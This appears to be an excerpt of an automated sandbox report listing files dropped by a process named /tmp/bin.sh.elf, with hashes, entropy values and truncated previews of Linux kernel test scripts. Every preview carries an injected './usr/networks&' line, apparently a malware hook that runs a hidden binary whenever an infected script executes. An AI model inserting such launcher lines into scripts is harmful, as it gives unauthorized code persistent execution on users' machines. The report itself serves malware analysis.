                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1985
                                                                        Entropy (8bit):5.1971922094030125
                                                                        Encrypted:false
                                                                        SSDEEP:48:rJDTmqUGoPRkFI6qUCjl4zXlfenS2xLz4:NmqSWFdzCgfenZs
                                                                        MD5:E22F86E80F1475933EE643B1098BB0BD
                                                                        SHA1:8AAB18EF3307CD428D30B6791D7E12B1CD1EEA14
                                                                        SHA-256:3FB64720524F18C23DCCD9056E2E9E4800E01B8D1616E436786534A0B077E152
                                                                        SHA-512:5BE1C828675CD3441606B1EE23A8C144327F160806C9AB1FC45C714351B72CE744AEFE7336901E0A9A6BD2E6D5BFBE7647A0A774D00BE3E3296C5CBAD7413206
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# We will get 8 HMI events per injection.# todo: deal with things being offline.expected_hmis=8.COUNT_HMIS() {. dmesg | grep -c 'Harmless Hypervisor Maintenance interrupt'.}..# massively expand snooze delay, allowing injection on all cores.ppc64_cpu --smt-snooze-delay=1000000000..# when we exit, restore it.trap "ppc64_cpu --smt-snooze-delay=100" 0 1..# for each chip+core combination.# todo - less fragile parsing.egrep -o 'OCC: Chip [0-9a-f]+ Core [0-9a-f]' < /sys/firmware/opal/msglog |.while read chipcore; do..chip=$(echo "$chipcore"|awk '{print $3}')..core=$(echo "$chipcore"|awk '{print $5}')..fir="0x1${core}013100"...# verify that Core FIR is zero as expected..if [ "$($GETSCOM -c 0x${chip} $fir)" != 0 ]; then...echo "FIR was not zero before injection for chip $chip, core $core. Aborting!"...echo "Result of $GETSCOM -c 0x${chip} $fir:"...$GETSCOM -c 0x${chip} $fir...echo "If you get a -5 error, the core may be in idle state. Try stress-ng."...echo "Other
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2153
                                                                        Entropy (8bit):5.195891220663769
                                                                        Encrypted:false
                                                                        SSDEEP:48:Kms2v0mGH+R5+l5dSu5hXflU4UeI8e/RERaGMuMEUTYLgW:NRtd8rlIt/ojLME+1W
                                                                        MD5:CEACB7A95D1C9705B086257F0B93BB4B
                                                                        SHA1:59936D2AEB984E1FBF1528311C23667612AFC979
                                                                        SHA-256:A09669A12D0556484AC42456FD565059D79E3178286FA8D8EAA519BFEDC6CC2A
                                                                        SHA-512:E20DC728490F76E787D38CBB5652E1EA292E25C20A9E93605F51E90198205940FDB76AE299A3C1073AAD294F449471DD1FA25707BC05716B60E16465CE0EB33B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..if [[ "$DEV" == "" ]]; then..echo "SKIP: PTP device not provided"..exit 0.fi..require_command().{..local cmd=$1; shift...if [[ ! -x "$(command -v "$cmd")" ]]; then...echo "SKIP: $cmd not installed"...exit 1..fi.}..phc_sanity().{..phc_ctl $DEV get &> /dev/null...if [ $? != 0 ]; then...echo "SKIP: unknown clock $DEV: No such device"...exit 1..fi.}..require_command phc_ctl.phc_sanity..##############################################################################.# Helpers..# Exit status to return at the end. Set in case one of the tests fails..EXIT_STATUS=0.# Per-test return value. Clear at the beginning of each test..RET=0..check_err().{..local err=$1...if [[ $RET -eq 0 && $err -ne 0 ]]; then...RET=$err..fi.}..log_test().{..local test_name=$1...if [[ $RET -ne 0 ]]; then...EXIT_STATUS=1...printf "TEST: %-60s [FAIL]\n" "$test_name"...return 1..fi...printf "TEST: %-60s [ OK ]\n" "$test_name"..return 0.}..tests_run().{..local current_test...for current_test in $
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):248
                                                                        Entropy (8bit):5.301131600273597
                                                                        Encrypted:false
                                                                        SSDEEP:6:Laq4bs4hJS6aYwJr3S6aYhNuS6aY5s/wRi0cLNQPn:msh6a3lC6ayh6anYo6n
                                                                        MD5:67AA2EFE0481FCDEB4895BD7E89D3D5C
                                                                        SHA1:9F38A80D6996FE3523B556B3914501C39264C62A
                                                                        SHA-256:952C4011DF7444FED43B6E2789DA36FE87257AF734F5D7FBFB527B196DDB9EC8
                                                                        SHA-512:3DEEECEF62BE7A50E2341F4F91FB310B00CE3EF5CCECC6B7AD687C924CD23B9DFAB72E0E94C2170AD178B4CA159B840A13E33E19F500A355B8A29E6CA38F0162
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit -1.fi.if grep -q '^CONFIG_SMP=n$' $cf.then..echo 1..exit 0.fi.if grep -q '^CONFIG_NR_CPUS=' $cf.then..grep '^CONFIG_NR_CPUS=' $cf | ...sed -e 's/^CONFIG_NR_CPUS=\([0-9]*\).*$/\1/'..exit 0.fi.cpus2use.sh../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):418
                                                                        Entropy (8bit):5.023825716215056
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vIe116vI4U8XXDM8qVRkW0qleOl3wcBn:rIe0dJDDxWvQOxwcB
                                                                        MD5:095294D70B3D26E07BA652BD30078A35
                                                                        SHA1:645C54D9E7FFB75E37C41B0963B76F0B227E0764
                                                                        SHA-256:DC6740540B21B0623A98A40A65D125501C4B952BB8F0E0C30A6C36348FEAFF7C
                                                                        SHA-512:4964AFB942DF134B89A066F768B9272675DCEE258BCE3A12D0F9E835AF146CAEA9CB7B22FE3D15D697972A5381A5E057F880F124B799110C37D387D41D94AB79
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..override=$2.if test -r $override.then..:.else..echo Override file $override unreadable!!!..exit 1.fi..T=${TMPDIR-/tmp}/config_override.sh.$$.trap 'rm -rf $T' 0.mkdir $T..sed < $override -e 's/^/grep -v "/' -e 's/=.*$/="/' |..awk '..{...if (last)....print last " |";...last = $0;..}..END {...if (last)....print last;..}' > $T/script.sh $T/script < $base.cat $override../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:awk or perl script, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):479
                                                                        Entropy (8bit):4.802626275594296
                                                                        Encrypted:false
                                                                        SSDEEP:6:wsFl4xaKy86WqGCePeGDPahXM6WqGIKmALledQhFo8sFRMoFoPsjsFPTJPsCFo2S:jnW1EIlahDFSPHPs92wWqBBOcwBjqn
                                                                        MD5:4F3513DA08C974EC143E30317C75475C
                                                                        SHA1:454B5F2CE62176AC272F38E13BC64755135FD85A
                                                                        SHA-256:DF6564EBE393B5B248466634AAF1928DF89FFD5C4A0E88E796DD1537AE47D8B2
                                                                        SHA-512:7F95742A9E7829C8867F6DA2E68C0B8757EB93CDFBEA42F41D48699795CCE33C9824697BAAAFE817B580CCE1DDF73ABA6F9D0D530B5992B8AF20DB84710F67BF
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi.ncpus=`grep '^processor' /proc/cpuinfo | wc -l`.idlecpus=`mpstat | tail -1 | \..awk -v ncpus=$ncpus '{ print ncpus * ($7 + $NF) / 100 }'`.awk -v ncpus=$ncpus -v idlecpus=$idlecpus < /dev/null '.BEGIN {..cpus2use = idlecpus;..if (cpus2use < 1)...cpus2use = 1;..if (cpus2use < ncpus / 10)...cpus2use = ncpus / 10;..if (cpus2use == int(cpus2use))...cpus2use = int(cpus2use)..else...cpus2use = int(cpus2use) + 1..print cpus2use;.}'.../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3848
                                                                        Entropy (8bit):5.4362980099954585
                                                                        Encrypted:false
                                                                        SSDEEP:96:aXqy/tAq8JV/VooTklj+kapJbV1hctBryYBfVqebVBE+0AXvHdTcwu9gZUcu8rkO:aBQH/HklUp5FctN7zB0A/pcwu2Ucu8rV
                                                                        MD5:3C47B98461A46FCFC4CF9B6605E3C812
                                                                        SHA1:04169142D0A3787759B050016D591E76DF0D6E03
                                                                        SHA-256:F66C090A9F517F78039B6FB52141B9FBB2B7EEACE681010C78CC181279F2F7E0
                                                                        SHA-512:A14536321412C34FC5EC96702FF91B3BF06C43A0602B4C5700E94F7562EDC108D0F8F1EB65A19489AEE1F51DDE89D804C1C08C29D3707685593BAFCA17D060E2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit -1..fi..grep -q '^CONFIG_HOTPLUG_CPU=y$' "$1".}..# identify_boot_image qemu-cmd.#.# Returns the relative path to the kernel build image. This will be.# arch/<arch>/boot/bzImage or vmlinux if bzImage is not a target for the.# architecture, unless overridden with the TORTURE_BOOT_IMAGE environment.# variable..identify_boot_image () {..if test -n "$TORTURE_BOOT_IMAGE"..then...echo $TORTURE_BOOT_IMAGE..else...case "$1" in...qemu-system-x86_64|qemu-system-i386)....echo arch/x86/boot/bzImage....;;...qemu-system-aarch64)....echo arch/arm64/boot/Image....;;...*)....echo vmlinux....;;...esac..fi.}..# identify_qemu builddir.#.# Returns our best guess as to which qemu command is appropriate for.# the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable..identify_qemu () {..local u="`file "$1"`"..if test -n "$TORTURE_QEMU_CMD"..then...echo $TORTURE_QEMU_CMD..elif echo $u | grep -q x86-64..then...echo qemu-system-x86_64..elif echo $u | grep -q "Intel 8038
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1191
                                                                        Entropy (8bit):5.219919938951854
                                                                        Encrypted:false
                                                                        SSDEEP:24:Mm/+2DKmCzxOGZDwml1NebqBhRpOVPsn0kFIj1XI7q:Mm/+22PZDwmlHBRpORsPwXb
                                                                        MD5:AE4B164E324E2725E5875DC6ACEE1139
                                                                        SHA1:714938D3C8B76FC6D9B47129E3B53A1D92AAD811
                                                                        SHA-256:0AE66B27CDC6DA8C66AC49B9E0271DA8486C10C373FABA74100A880C54CA3842
                                                                        SHA-512:8456D1C81C695A761FAFB1C3B794C4E46718815135D44D775DF744B54E82C74D59E5DDA11B6D9FBAA0CF2712CD8E25A95ABCE8344EBE69143C4CC8FCC5E07997
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 0;..fi...# Set affinity to randomly selected online CPU..cpus=`grep 1 /sys/devices/system/cpu/*/online |...sed -e 's,/[^/]*$,,' -e 's/^[^0-9]*//'`...# Do not leave out poor old cpu0 which may not be hot-pluggable..if [ ! -f "/sys/devices/system/cpu/cpu0/online" ]; then...cpus="0 $cpus"..fi...cpumask=`awk -v cpus="$cpus" -v me=$me -v n=$n 'BEGIN {...srand(n + me + systime());...ncpus = split(cpus, ca);...curcpu = ca[int(rand() * ncpus + 1)];...mask = lshift(1, curcpu);...if (mask + 0 <= 0)....mask = 1;...printf("%#x\n", mask);..}' < /dev/null`..n=$(($n+1))..if ! taskset -p $cpumask $$ > /dev/null 2>&1..then...echo taskset failure: '"taskset -p ' $cpumask $$ '"'...exit 1..fi...# Sleep a random duration..sleeptime=`awk -v me=$me -v n=$n -v sleepmax=$sleepmax 'BEGIN {...srand(n + me + systime());...printf("%06d", int(rand() * sleepmax));..}' < /dev/null`..n=$(($n+1))..sleep .$sleeptime...# Spin a random duration..limit=`awk -v me=$me -v n=$n -v spinmax=$spinmax 'BEGI
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):719
                                                                        Entropy (8bit):5.456071477133004
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6rMJ4mgtD51pbKRmY2uH5SY7d3VOAan69dAeuVuYFFses4mseowZExeskWnn:E2mi51xXYZZS23VOCT7uVPS8VkWn
                                                                        MD5:0E3CB1C0055AFADC1C754205DE278D67
                                                                        SHA1:4059B70FD319BCF46F1DD180C2BD65919CCDEB74
                                                                        SHA-256:70B7C3D2E18D82326962A335B5A0BC3B19DCE6A56735FA172C15452C98FB7905
                                                                        SHA-512:FE8CDCBB9341CA257E0F7B9AC7D4A0AF88A2CD7A87D5DAE0E4D5A0108B65498032FDFDA5D62FA262B0067D9B6937FC408E4021568D5243696007945CE2776A39
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi.resdir=${2}..T=${TMPDIR-/tmp}/test-linux.sh.$$.trap 'rm -rf $T' 0.mkdir $T..cp ${config_template} $T/config.cat << ___EOF___ >> $T/config.CONFIG_INITRAMFS_SOURCE="$TORTURE_INITRD".CONFIG_VIRTIO_PCI=y.CONFIG_VIRTIO_CONSOLE=y.___EOF___..configinit.sh $T/config $resdir.retval=$?.if test $retval -gt 1.then..exit 2.fi.ncpus=`cpus2use.sh`.make -j$ncpus $TORTURE_KMAKE_ARG > $resdir/Make.out 2>&1.retval=$?.if test $retval -ne 0 || grep "rcu[^/]*": < $resdir/Make.out | egrep -q "Stop|Error|error:|warning:" || egrep -q "Stop|Error|error:" < $resdir/Make.out.then..echo Kernel build error..egrep "Stop|Error|error:|warning:" < $resdir/Make.out..echo Run aborted...exit 3.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):96
                                                                        Entropy (8bit):4.256066773559547
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaywJejG2aKJLUQSXVOORgn:wCej/BZHSMn
                                                                        MD5:47B2DFB43AC8D11D8AF9C54AFB92BF3A
                                                                        SHA1:C98675863C1D74A923FD89014918FC45F6C9A3C6
                                                                        SHA-256:433231EE364303B5E085E5AB83E628F522958244F525CB015D4E4CA226AEACA7
                                                                        SHA-512:F756226C69A6AE738A092D1DA5E1C6472C21B27CCE6735FCE5AF7EF49868E9F3177900AE6B4960B68E2EA7B737295DEB44F3805F94EC55853929CAEC6301B137
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.else..echo No errors in console logs...exit 0.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:awk or perl script, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):579
                                                                        Entropy (8bit):4.968576899007941
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vHIjs/NbRQG9GtcDVKZqCi8wBQ9fFs40ldvcPXVfgeYn:rfDQhKDwZ/L9Ns+vV49
                                                                        MD5:979991AFA6A7D7425AD7C067CD5C6AC2
                                                                        SHA1:4EBE72228115109BA3DD14F4649ABC2CE27692FF
                                                                        SHA-256:8C0805B46010E232FBCB8D6AD91D98A6168CC25A1FA5E7D766F7129F1314BCF2
                                                                        SHA-512:332AD2A7823972D06AFD2AE52A46D266AE4FA40FC2C8A4DB9B3B902BE0696476286726AD06391A769477EEA0E57FD17CC6234D079FAD5C83755AAFD249303329
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..configfile=`echo $i | sed -e 's/^.*\///'`.ncs=`grep "Writes: Total:" $i/console.log 2> /dev/null | tail -1 | sed -e 's/^.* Total: //' -e 's/ .*$//'`.if test -z "$ncs".then..echo "$configfile -------".else..title="$configfile ------- $ncs acquisitions/releases"..dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`..if test -z "$dur"..then...:..else...ncsps=`awk -v ncs=$ncs -v dur=$dur '....BEGIN { print ncs / dur }' < /dev/null`...title="$title ($ncsps per second)"..fi..echo $title.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:awk or perl script, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1557
                                                                        Entropy (8bit):5.128177512727413
                                                                        Encrypted:false
                                                                        SSDEEP:48:/ji7NQQ1mNOtOsl8GpG0YrvBn02WEnxxCXt8ommYlmrBsmUb:yQ1NSjpGHB8dtY8rTI
                                                                        MD5:F5785CDFA33136A153C917D211A23D17
                                                                        SHA1:04D08AB0A9604A35EB9912BCD6DF4CFCB8617D08
                                                                        SHA-256:5BA323C0D42BFCFED74609EF4CDC517ABBF570B1EAE841338B1B8E9BC7759750
                                                                        SHA-512:CBDAB4C924405CC4EED685679CD3FAC08B46E9C7E2CBDDE37ABFB1E18325223E344DCEC947DC35231B7B4B6B75A77B25B7CEFA418D91EF8B7A8AF9B31851DFA3
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi.. functions.sh..configfile=`echo $i | sed -e 's/^.*\///'`.ngps=`grep ver: $i/console.log 2> /dev/null | tail -1 | sed -e 's/^.* ver: //' -e 's/ .*$//'`.stopstate="`grep 'End-test grace-period state: g' $i/console.log 2> /dev/null |.. tail -1 | sed -e 's/^\[[ 0-9.]*] //' |.. awk '{ print \"[\" $1 \" \" $5 \" \" $6 \" \" $7 \"]\"; }' |.. tr -d '\012\015'`".if test -z "$ngps".then..echo "$configfile ------- " $stopstate.else..title="$configfile ------- $ngps GPs"..dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`..if test -z "$dur"..then...:..else...ngpsps=`awk -v ngps=$ngps -v dur=$dur '....BEGIN { print ngps / dur }' < /dev/null`...title="$title ($ngpsps/s)"..fi..echo $title $stopstate..nclosecalls=`grep --binary-files=text 'torture: Reader Batch' $i/console.log | tail -1 | awk '{for (i=NF-8;i<=NF;i++) sum+=$i; } END {print sum}'`..if test -z "$nclosecalls"..then...exit 0..fi..if test "$nclosecalls" -eq 0..then.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2182
                                                                        Entropy (8bit):5.113870463978564
                                                                        Encrypted:false
                                                                        SSDEEP:24:6Ee9Ov1jq+6vTZG7TdvOV9CGW59gYHh+5x/BQlG8OW+oE0+EV0eW+vB/0HL0MmSI:6lvTs709ClcnG5B/6/8bBFXcl2U/172Z
                                                                        MD5:69C65F8778291988E21922FB456C3C52
                                                                        SHA1:9D380BDC43853D325A4BC9FF35D0A7BC9AAD1D87
                                                                        SHA-256:A49DB2EE35BB00FD042DF74EEC201078948581ED9577EBB2443968CF2F6812A3
                                                                        SHA-512:F908D32300B1BF298EDC4BDB658383B94A6E8417CCFA24A925E22E6F398AD730F776EA820958F757C25731A9FCFBAFD11AB58F5BC5F0ADEECF8A4A773DC6E213
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 10.fi..sed -e 's/^\[[^]]*]//' < $i/console.log |.grep 'us : rcu_exp_grace_period' |.sed -e 's/us : / : /' |.tr -d '\015' |.awk '.$8 == "start" {..if (startseq != "")...nlost++;..starttask = $1;..starttime = $3;..startseq = $7;..seqtask[startseq] = starttask;.}..$8 == "end" {..if (startseq == $7) {...curgpdur = $3 - starttime;...gptimes[++n] = curgpdur;...gptaskcnt[starttask]++;...sum += curgpdur;...if (curgpdur > 1000)....print "Long GP " starttime "us to " $3 "us (" curgpdur "us)";...startseq = "";..} else {...# Lost a message or some such, reset....startseq = "";...nlost++;..}.}..$8 == "done" && seqtask[$7] != $1 {..piggybackcnt[$1]++;.}..END {..newNR = asort(gptimes);..if (newNR <= 0) {...print "No ftrace records found???"...exit 10;..}..pct50 = int(newNR * 50 / 100);..if (pct50 < 1)...pct50 = 1;..pct90 = int(newNR * 90 / 100);..if (pct90 < 1)...pct90 = 1;..pct99 = int(newNR * 99 / 100);..if (pct99 < 1)...pct99 = 1;..div = 10 ** int(log(gptimes[pct90]) / log(10
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1647
                                                                        Entropy (8bit):5.17716483084646
                                                                        Encrypted:false
                                                                        SSDEEP:24:SWaDjwbwpaqsMmffs+6QW595Hh+6x/BQlG8OW+oE0+EV0eW+vB/0HL0UjlJS+9XT:gwbwMqsVCRcsG5B/6/FXcl2U/1t2
                                                                        MD5:9AF4AC39ECDDFCA8A34238215BAD591B
                                                                        SHA1:666B7D95D28D4A8A6F11105BA524B700BF7D67A3
                                                                        SHA-256:4FA88C47323E7104E9A7B759A508845D5B3039AEB16D3E33384FF870D29D367B
                                                                        SHA-512:4F1B991BD2D70824B8E31E88DED646A90DB7E99BDAF4E9CD236099BCCF125F576BE289C643A2D80C01FA8987D2C3769078D7B2E5B2815055AB1F191E488B97AA
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi.PATH=`pwd`/tools/testing/selftests/rcutorture/bin:$PATH; export PATH.. functions.sh..if kvm-recheck-rcuperf-ftrace.sh $i.then..# ftrace data was successfully analyzed, call it good!..exit 0.fi..configfile=`echo $i | sed -e 's/^.*\///'`..sed -e 's/^\[[^]]*]//' < $i/console.log |.awk './-perf: .* gps: .* batches:/ {..ngps = $9;..nbatches = $11;.}../-perf: .*writer-duration/ {..gptimes[++n] = $5 / 1000.;..sum += $5 / 1000.;.}..END {..newNR = asort(gptimes);..if (newNR <= 0) {...print "No rcuperf records found???"...exit;..}..pct50 = int(newNR * 50 / 100);..if (pct50 < 1)...pct50 = 1;..pct90 = int(newNR * 90 / 100);..if (pct90 < 1)...pct90 = 1;..pct99 = int(newNR * 99 / 100);..if (pct99 < 1)...pct99 = 1;..div = 10 ** int(log(gptimes[pct90]) / log(10) + .5) / 100;..print "Histogram bucket size: " div;..last = gptimes[1] - 10;..count = 0;..for (i = 1; i <= newNR; i++) {...current = div * int(gptimes[i] / div);...if (last == current) {....count++;...} else {....if (
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):6480
                                                                        Entropy (8bit):5.302615493815468
                                                                        Encrypted:false
                                                                        SSDEEP:192:UW7mo8L6zCQaO59QRYE7uz+jO+O81DhfoaDSl4choF5NDI:UWzzzCXa0YE7uztdQDhAamlVhoF5NDI
                                                                        MD5:44DEEDB4AE1B9A70CF6C582D4342BB80
                                                                        SHA1:DCA684F2C6BD5E87F8F44E388EB7DBDEA4810B07
                                                                        SHA-256:D5C180BFF335FF5F0A0E4E009CBE129588365A187A7A9F71E2C53F2AB4E1A674
                                                                        SHA-512:72D81A95E8A725BF91D50789F058D4C23452DAA6D62F500255C4965E91756B4DC38F2FE743A300ABF085DC11DA8B804E442420A4BE8CEF88BCC7EFF896DFC7AC
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi.echo ' ---' `date`: Starting build.echo ' ---' Kconfig fragment at: $config_template >> $resdir/log.touch $resdir/ConfigFragment.input $resdir/ConfigFragment.if test -r "$config_dir/CFcommon".then..echo " --- $config_dir/CFcommon" >> $resdir/ConfigFragment.input..cat < $config_dir/CFcommon >> $resdir/ConfigFragment.input..config_override.sh $config_dir/CFcommon $config_template > $T/Kc1..grep '#CHECK#' $config_dir/CFcommon >> $resdir/ConfigFragment.else..cp $config_template $T/Kc1.fi.echo " --- $config_template" >> $resdir/ConfigFragment.input.cat $config_template >> $resdir/ConfigFragment.input.grep '#CHECK#' $config_template >> $resdir/ConfigFragment.if test -n "$TORTURE_KCONFIG_ARG".then..echo $TORTURE_KCONFIG_ARG | tr -s " " "\012" > $T/cmdline..echo " --- --kconfig argument" >> $resdir/ConfigFragment.input..cat $T/cmdline >> $resdir/ConfigFragment.input..config_override.sh $T/Kc1 $T/cmdline > $T/Kc2..# Note that "#CHECK#" is not permitted on commandline.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:awk or perl script, ASCII text, with very long lines (378)
                                                                        Category:dropped
                                                                        Size (bytes):11017
                                                                        Entropy (8bit):5.6019167894868325
                                                                        Encrypted:false
                                                                        SSDEEP:192:kfJ9dYxMSf4uZqtpi0SwJjZhevAw+N/w7HD/29w36HVn+7A05qBLUbIQbthh:kfJTIMSf4uZqtBSwvHN/w7j/29wGVn+L
                                                                        MD5:B167C149D77482F3615457A85A7C5536
                                                                        SHA1:CF3BEF44B1E9EC81075A3F675AD3888139E8B7FA
                                                                        SHA-256:432C7CA4ABC3FBB331A1707A953FB4E5896D78DD6DE367FF4BB990BBBFB62FF9
                                                                        SHA-512:0C3B520C282ED66588D576DF270664C6EF4FFDCCBF239930EE30DF4BF834F30CF8D8633D0704A8743888F814862E170425F83FF7BDAB453E1E5727009CF94EE2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..while test $# -gt 0.do..case "$1" in..--bootargs|--bootarg)...checkarg --bootargs "(list of kernel boot arguments)" "$#" "$2" '.*' '^--'...TORTURE_BOOTARGS="$2"...shift...;;..--bootimage)...checkarg --bootimage "(relative path to kernel boot image)" "$#" "$2" '[a-zA-Z0-9][a-zA-Z0-9_]*' '^--'...TORTURE_BOOT_IMAGE="$2"...shift...;;..--buildonly)...TORTURE_BUILDONLY=1...;;..--configs|--config)...checkarg --configs "(list of config files)" "$#" "$2" '^[^/]*$' '^--'...configs="$2"...shift...;;..--cpus)...checkarg --cpus "(number)" "$#" "$2" '^[0-9]*$' '^--'...cpus=$2...TORTURE_ALLOTED_CPUS="$2"...shift...;;..--datestamp)...checkarg --datestamp "(relative pathname)" "$#" "$2" '^[^/]*$' '^--'...ds=$2...shift...;;..--defconfig)...checkarg --defconfig "defconfigtype" "$#" "$2" '^[^/][^/]*$' '^--'...TORTURE_DEFCONFIG=$2...shift...;;..--dryrun)...checkarg --dryrun "sched|script" $# "$2" 'sched\|script' '^--'...dryrun=$2...shift...;;..--duration)...checkarg --duration "(
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:C source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3043
                                                                        Entropy (8bit):5.211893461133884
                                                                        Encrypted:false
                                                                        SSDEEP:48:F1ZBW8oMIGWzbk4rwEJOrWKb9DvFYx5FXAm1QZyGZXgs9DQV09keu0KbcxyHcXEp:F1c84rbOyk9DebFQvyGJgsUPWxyHWEp
                                                                        MD5:1F2A5D60152141EFC8709F27266DCB41
                                                                        SHA1:9380E59CEB5522297EF8A768DF0099AC42135957
                                                                        SHA-256:9777F28693F71100B44B3FDC2572D85544C9C79F7C72717EAE62338310D5E649
                                                                        SHA-512:B72525791FBB0F3CC7126D4B3F09FD8D2A3BFEC8279F4578F5EF99E250BCD8F87C7B663E1B323F8D1C51C45E276A1E1DB09FD2980C9AE3D17C39356F16527E86
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.[ -z "$D" ] && echo >&2 "No argument supplied" && exit 1.if [ ! -d "$D" ]; then. echo >&2 "$D does not exist: Malformed kernel source tree?". exit 1.fi.if [ -s "$D/initrd/init" ]; then. echo "$D/initrd/init already exists, no need to create it". exit 0.fi..T=${TMPDIR-/tmp}/mkinitrd.sh.$$.trap 'rm -rf $T' 0 2.mkdir $T..cat > $T/init << '__EOF___'.#!/bin/sh.# Run in userspace a few milliseconds every second. This helps to.# exercise the NO_HZ_FULL portions of RCU. The 192 instances of "a" was.# empirically shown to give a nice multi-millisecond burst of user-mode.# execution on a 2GHz CPU, as desired. Modern CPUs will vary from a.# couple of milliseconds up to perhaps 100 milliseconds, which is an.# acceptable range..#.# Why not calibrate an exact delay? Because within this initrd, we.# are restricted to Bourne-shell builtins, which as far as I know do not.# provide any means of obtaining a fine-grained timestamp...a4="a a a a".a16="$a4 $a4 $a4 $a4".a64="$
